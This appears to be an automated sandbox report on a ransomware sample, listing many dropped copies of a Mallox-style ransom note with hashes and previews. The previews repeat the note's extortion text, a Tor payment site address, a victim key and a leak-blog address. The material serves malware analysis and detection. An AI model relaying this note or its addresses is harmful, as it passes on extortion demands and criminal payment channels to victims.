                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\MF\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\MapData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:modified
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\NetFramework\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Network\Connections\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Network\Downloader\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Network\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Office\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Provisioning\AssetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Provisioning\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Search\Data\Applications\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Search\Data\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Search\Data\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Search\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Settings\Accounts\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):57452
                        Entropy (8bit):7.997015954544101
                        Encrypted:true
                        SSDEEP:1536:rlHQ/51Em4vcU6a4rTRMhAmJwhHuCJL3baLjFZH+S4:RHM/VUmRxmapFLWjFF+H
                        MD5:877977F3E640D581772EF39E973A1092
                        SHA1:BDA92050DC5A5B3A8C72CE04D17DF5506B4B4AA9
                        SHA-256:4298B7865B2DE71396AF45E4BA1C9D839C6FE3AD5276DF8A1588C6A901244791
                        SHA-512:A4E5ADD6CFC8DA0DF9DD6E0FA429AB7C42CBB6691E22B0060835C7CB71C51EEEFE9CD3C535945985BE4963CD084C2FC5C45808500FE7C3AE06AFA872FAF1D05E
                        Malicious:true
